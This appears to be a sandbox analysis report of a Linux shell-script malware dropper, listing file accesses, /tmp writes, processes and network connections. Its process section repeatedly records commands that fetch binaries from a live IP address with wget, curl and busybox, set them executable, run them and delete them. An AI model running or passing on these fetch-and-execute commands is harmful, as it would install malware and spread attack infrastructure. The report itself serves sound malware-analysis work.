| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
